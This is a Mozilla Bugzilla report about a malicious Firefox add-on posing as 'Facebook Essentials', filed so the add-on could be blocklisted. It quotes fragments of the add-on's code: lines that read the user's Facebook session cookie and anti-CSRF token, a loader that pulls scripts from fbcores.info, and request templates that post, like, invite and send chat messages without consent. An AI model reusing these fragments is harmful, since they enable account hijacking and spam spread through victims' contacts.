Bug 739482 - Malicious "Facebook Essentials" add-on
: Malicious "Facebook Essentials" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-03-26 17:36 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)


Attachments
20120326_freesms.zip (password is 'infected') (62.81 KB, application/octet-stream)
2012-03-26 17:36 PDT, MarkH

Description MarkH 2012-03-26 17:36:49 PDT
Created attachment 609552
20120326_freesms.zip (password is 'infected')

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11

Steps to reproduce:

Downloaded the add-on from http://buzz-france[.]info/freesms.xpi


Actual results:

Harvests the logged-in user's Facebook session from the browser — it reads the `c_user` cookie and the `fb_dtsg` anti-CSRF token out of the page — and then drives the account through XMLHttpRequests sent with the user's own session: it likes pages (and YouTube videos), joins Facebook events and sends event invitations, posts status updates and shares, and sends chat messages to the user's contacts, all without consent. The add-on is a XUL overlay on the main browser window (chrome://browser/content/browser.xul) and additionally injects scripts fetched at run time from http://fbcores[.]info/ (sms.js, gkuyrr.js), so its behaviour can be changed remotely at any time without the add-on itself changing. See the automated extract from the add-on below (URLs in the extract are reproduced as found; do not visit them):

** Embedded and Remote Files **

content/youtube.js
http://fbcores.info/sms.js
http://fbcores.info/gkuyrr.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
content/prefman.js
content/skin/icon.png
content/script-compiler.js
install.rdf
chrome.manifest


** Embedded Metadata **

<em:name>Facebook Essentials</em:name>
<em:version>1.0</em:version>
<em:type>2</em:type>
<em:creator>Arash Jafari</em:creator>
<em:developer>Arash Jafari</em:developer>
<em:description>Facebook Essentials</em:description>
<em:homepageURL>http://www.klate.com/</em:homepageURL>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:targetApplication>
<em:minVersion>3.5</em:minVersion>
<em:maxVersion>15.*</em:maxVersion>
</em:targetApplication>


** Files Loaded **

...pt type='application/x-javascript'
src='chrome://youtube/content/youtube.js'></s...
'chrome://youtube/content/youtube.js'
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/sc
ript-com...


** Remote Javascript Loaded **

var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://fbcores.info/sms.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://fbcores.info/gkuyrr.js");
...tachment[params][metaTagMap][2][name]=description&attachment[params][met
aTagMap]...
for (i=0; i<document.getElementsByTagName('script').length; i++) {
var a = document.getElementsByTagName('script')[i].innerHTML;
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script
type='application/x-javascript' s...
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
<Description about="urn:mozilla:install-manifest">
<em:description>Facebook Essentials</em:description>
<Description>
</Description>
</Description>
...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul


** Facebook Paths Accessed **

top.location.href = 'http://facebook.com'
if (stompa.indexOf('facebook.com') > 0) {
...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' +
user_id + '...
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
...er.indexOf('Mora em <a
href="http://www.facebook.com/pages/S%C3%A3o-Paulo-Brazil...
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = '/ajax/connect/external_node_connect.php?__a=1';
var urlwp = '/ajax/sharer/submit/?__a=1';
var urlwp = '/ajax/profile/composer.php?__a=1';
...var postmessagetext = 'O meu perfil do Facebook foi acessado ' + rtotal
+ ' veze...
...var postmessage = 'O meu perfil do Facebook foi acessado ' + rtotal + '
vezes em...
var urlwp = '/ajax/updatestatus.php?__a=1';
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
...nha nesse concurso de Imagem
Digital\x0Afacebook.com/photo.php?fbid=309406152446...
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
var urlwp = '/ajax/questions/ask_friends.php?qid=' + qid + '&__a=1';
var urlwp = '/ajax/events/permalink/join.php?__a=1';
var urlwp = '/ajax/events/invite/send/?__a=1';
"www.facebook.com",
"http://facebook.com",
"www.facebook.fr",
"http://facebook.fr",
"www.facebook.ca",
"http://facebook.ca",
"www.facebook.co.uk",
"http://facebook.co.uk"
"Curti esse facebook colorido ;) " + fbhost + "/photo.php?fbid=" + fbid,
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
...open("POST", "/ajax/ufi/modify.php?__a=1"),
setRequestHeader("Content-Type", "ap...
<em:id>GifBlock@facebook.com</em:id>
<em:name>Facebook Essentials</em:name>
<em:description>Facebook Essentials</em:description>


** Facebook Data Accessed **

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
console.log(fb_dtsg)
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
..._mod]=like_widget&nctr[_impid]=4a44dc9a&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...custom_value]=50&audience[0][value]=111&fb_dtsg=' + fb_dtsg +
'&message=@[' + fr...
...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=...
...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=...
...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for
m_id_sou...
...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for
m_id_sou...
...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg +
"&lsd&post_form_id...
...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...D0%84&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg +
"&feedback_params=...


** HTTP Requests **

gf = new XMLHttpRequest();
...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' +
user_id + '...
var httpwp = new XMLHttpRequest();
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var http3 = new XMLHttpRequest();
http3.open("POST", url3, true);
var httpc = new XMLHttpRequest();
httpc.open("POST", urlc, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
with(newx = new XMLHttpRequest())
...open("POST", "/ajax/ufi/modify.php?__a=1"),
setRequestHeader("Content-Type", "ap...
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

top.location.href = 'http://facebook.com'
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
...if (outer.indexOf('Mora em <a
href="http://www.facebook.com/pages/S%C3%A3o-Paulo...
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var toLikes = new Array("http://bit.ly/GW7Mjb");
var shareurls = new Array("http://www.youtube.com/watch?v=QMucCamyuSI");
...var postimgs = new
Array("http://media.salon.com/2010/05/outrage_over_the_smokin...
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
"http://facebook.com",
"http://fb.com",
"http://facebook.fr",
"http://facebook.ca",
"http://facebook.co.uk"
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjm...
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjl...
...var urlwp =
"http://www.youtube.com/watch_actions_ajax?action_like_video=1&video...
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjm...
s.setAttribute("src", "http://fbcores.info/gkuyrr.js");
s.setAttribute("src", "http://fbcores.info/sms.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul<
/code></...
...<dd><a
href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org..
.
...<?xml version="1.0"?><overlay
xmlns='http://www.mozilla.org/keymaster/gatekeeper...
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://www.klate.com/</em:homepageURL>



Expected results:

It should not harvest the user's Facebook session credentials (cookie and anti-CSRF token) or perform actions on the user's account on their behalf without their consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-03-27 10:51:46 PDT
Add-on ID (from install.rdf): GifBlock@facebook.com
Comment 2 Jorge Villalobos [:jorgev] 2012-03-27 10:54:00 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i79
